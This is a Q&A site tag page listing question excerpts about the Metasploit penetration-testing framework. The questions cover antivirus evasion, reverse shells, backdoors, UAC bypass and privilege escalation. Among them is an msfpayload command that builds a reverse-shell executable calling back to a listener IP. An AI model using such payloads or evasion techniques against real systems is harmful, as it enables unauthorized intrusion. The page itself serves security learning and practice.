Questions tagged [metasploit]

Metasploit is an open source exploitation framework that acts as a tool for developing and executing exploit code against a remote target machine.

The Metasploit Framework is an open-source project owned/sponsored by Rapid7 for vulnerability assessment, exploitation development, penetration testing, and many other computer and network security-related tasks.

Since version 3 of the Framework, Metasploit has been written primarily in Ruby. Version 2 and older were written in Perl. The various payloads, stagers, and shellcodes are primarily written in C, assembly, and Java.

Metasploit is developed on GitHub. Documentation and community forums are available on Rapid7's community site. Questions can also be asked in the #metasploit channel on Freenode.

510 questions
14 votes, 3 answers

Is it safe to install metasploit on my work computer?

I'm new to metasploit, and want to install it on the work computer I use every day; but I'm not sure whether it is safe. Are there any best practices when using metasploit?
elsadek
12 votes, 5 answers

Techniques for Anti Virus evasion

What are some good anti virus evasion techniques when using ps_exec? As a pentester I often encounter situations where you can't, for one, exploit a machine as they are running anti-virus software on their machines. I'm mostly talking about binaries…
Lucas Kauffman
10 votes, 1 answer

When to use a Bind shell vs. a Reverse shell?

Metasploit question:- I know what these shells are but am a little confused on the execution. Assuming that you successfully get a meterpreter shell and want to upload a backdoor, what should you use as a payload in the backdoor file- should I use a…
Utkarsh Agrawal
10 votes, 2 answers

importing OpenVAS xml in metasploit

I am practising in my lab with some metasploitable machines, and I just realised that the vulns declared by OpenVAS 6.01 in the scan report aren’t imported in Metasploit 4.11.5 by the db_import report-blah.xml. When I read the report on the OpenVAS…
Sarastro
9 votes, 1 answer

What is a Payload Handler?

I'm new to Metasploit, and in a book it was said that when a reverse shell is used by an attacker, a handler is initiated. I've searched about it but haven't found any satisfactory information about the 'Handler'. What is it?
Abhirup Bakshi
8 votes, 2 answers

source code of metasploit payloads(shellcodes)

Is there a way to see the source code of Metasploit shellcodes? For example: root@kali:~# msfpayload windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 C /* * windows/shell_bind_tcp - 341 bytes * http://www.metasploit.com * VERBOSE=false, LPORT=1234,…
Farseer
7 votes, 1 answer

What are the good resources for learning Metasploit?

I'm a newbie (Script kiddie) and I want to learn more about Metasploit. Not for fun, but to understand what exploits are, how they are used, and deployed. I've heard a lot about the Metasploit framework being good. I've even started reading the…
TheRookierLearner
7 votes, 2 answers

Using stored creds in a metasploit module

Metasploit smartly stores your creds in its internal database, whether you've manually entered them by using a previous module or whether you've dumped them with smart_hashdump. You can view stored creds with creds. I've searched, but without…
Juicy
6 votes, 2 answers

Metasploit wmap_run -e hangs with Using code '404' as not found

Background When I run Metasploit, it hangs at the same place no matter what I do. It stops at this line, [*] Using code '404' as not found. Steps to reproduce, msf > mfsconsole msf > load wmap msf > wmap_sites -l msf > wmap_targets -t…
NDiaz
5 votes, 2 answers

Is it possible to execute a command on the local computer in meterpreter?

While running the meterpreter handler, is it possible to execute a command on the local computer? That wasn't mentioned in the output of the help command. I also tried !ls, to no avail. Is it possible then?
daisy
5 votes, 4 answers

windows/shell_reverse_tcp exploit is not working if listener is not running already

I am using Metasploit to generate a shell_reverse_tcp exploit using the following command: msfpayload windows/shell_reverse_tcp LHOST=192.168.1.171 x > exploit.exe On listener side I am using netcat. Everything is perfect and if I run the listener…
localhost
5 votes, 2 answers

How to run exploit/windows/local/bypassuac using AutoRunScript?

Is there a way to run exploits that require parameters, such as the one in the title, using AutoRunScript? I was able to use AutoRunScript to execute some post commands perfectly, such as keylog_recorder or checkvm. But when I added my script…
user342872
4 votes, 2 answers

Need a session ID to make a privilege escalation MSF module work

I have a limited shell on a machine and I would like to use a Metasploit module to escalate privileges. Problem: I did not get the limited shell with a metasploit module, and the metasploit module for escalation asks for a session ID. So my…
adrTuIPKJ44
3 votes, 2 answers

How can I add modules to a Payload on Metasploit

I know how to create payloads using Metasploit and then script an AutoRun script, so when the victim machine connects back to my Kali Server it executes some actions. Works sweet! What I wanted to do is create a payload weaponized with actions (Create…
Frosa
3 votes, 1 answer

Metasploit Pivoting on loopback?

I'm pen-testing a Windows 7 machine, and have access to a limited remote shell. I can see there's a vulnerable SMB service running on the machine's loopback, but it's not available externally. Is there any way I can run a metasploit exploit over the…
James